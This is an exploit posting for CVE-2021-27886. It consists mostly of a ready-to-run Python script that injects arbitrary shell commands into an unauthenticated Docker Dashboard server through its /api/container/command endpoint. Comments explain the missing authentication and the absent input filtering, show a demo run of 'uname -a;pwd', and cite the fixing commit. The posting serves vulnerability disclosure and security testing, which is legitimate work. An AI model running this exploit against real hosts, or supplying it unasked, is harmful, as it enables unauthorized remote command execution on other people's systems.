Docker Dashboard Remote Command Execution
Posted Jul 7, 2021
Authored by Jeremy Brown

Docker Dashboard suffers from a remote command execution vulnerability. The fix is added in commit 79cdc41.

tags | exploit, remote
advisories | CVE-2021-27886
SHA-256 | 9b77e4733c86f91e56473cf9d0f921975dafea71ff7b3a299b9f700be4daf219

#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# dockdash.py
#
# Docker Dashboard Remote Command Execution Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# July 2021
#
# "A simple web based GUI for managing Docker containers and images"
#
# Note: this app is NOT part of the official docker product, nor related to the
# Docker Dashboard UI in Docker Desktop. They are different projects and maintainers.
#
# More info: https://dockerdashboard.github.io
#
# -------
# Details
# -------
#
# The web GUI runs on port 3230. There are two main issues that enable the RCE...
#
# 1) Although when starting the server it says go to http://localhost:3230, it's
# actually listening on the network interface by default. There is no auth
# so anyone with access can start exercising functionality of the app.
#
# 2) Normally these controllers are used to start, stop or create new containers.
# But no validation of parameters or filtering based on acceptable commands sent
# to docker on the backend enables clean, vanilla command injection as the
# running user. Many of the APIs are vulnerable, with the most notable ones
# being /api/container/command and /api/image/command.
#
# ----
# Demo
# ----
#
# > ./dockdash.py 10.1.1.102 "uname -a;pwd"
# Linux ubuntu 5.4.0-48-generic #51-Ubuntu x86_64 GNU/Linux
# /opt/docker-web-gui/backend
#
# CVE-2021-27886
#
# Fix
# - commit 79cdc41
#

import sys
import argparse
import requests

DEFAULT_PORT = 3230
# Response header the dashboard's Express backend sends; used as a sanity check.
SIGNATURE = ('X-Powered-By', 'Express')


class DockDash(object):
    def __init__(self, args):
        self.target = args.target
        self.cmd = args.cmd

    def run(self):
        target = "http://" + self.target + ':' + str(DEFAULT_PORT)

        session = requests.Session()

        try:
            resp = session.head(target + "/")
        except Exception as error:
            print("Error: %s" % error)
            return -1

        if SIGNATURE not in resp.headers.items():
            print("%s doesn't look like a dashboard server..." % target)
            return -1

        commands = self.cmd.split(';')

        #
        # "out here trying to get a mf'in scholarship"
        #
        for command in commands:
            try:
                resp = session.get(target +
                                   "/api/container/command?container=&command=;" + command)
                # "/api/image/command?image=&command=;" + command)
            except Exception as error:
                print("Error: %s" % error)
                return -1

            if resp.status_code == 200:
                # The API returns the command output as a JSON string literal.
                response = resp.text.strip('"').replace('\\n', '\n')
                print("%s" % response)
            else:
                print("something went wrong, server returned %d" % resp.status_code)
                return -1

        return 0


def arg_parse():
    parser = argparse.ArgumentParser()

    parser.add_argument("target",
                        type=str,
                        help="DD host")

    parser.add_argument("cmd",
                        type=str,
                        help="command to execute")

    args = parser.parse_args()

    return args


def main():
    args = arg_parse()

    dd = DockDash(args)

    result = dd.run()

    # run() returns -1 on failure, so test for any non-zero result.
    if result != 0:
        sys.exit(1)


if __name__ == '__main__':
    main()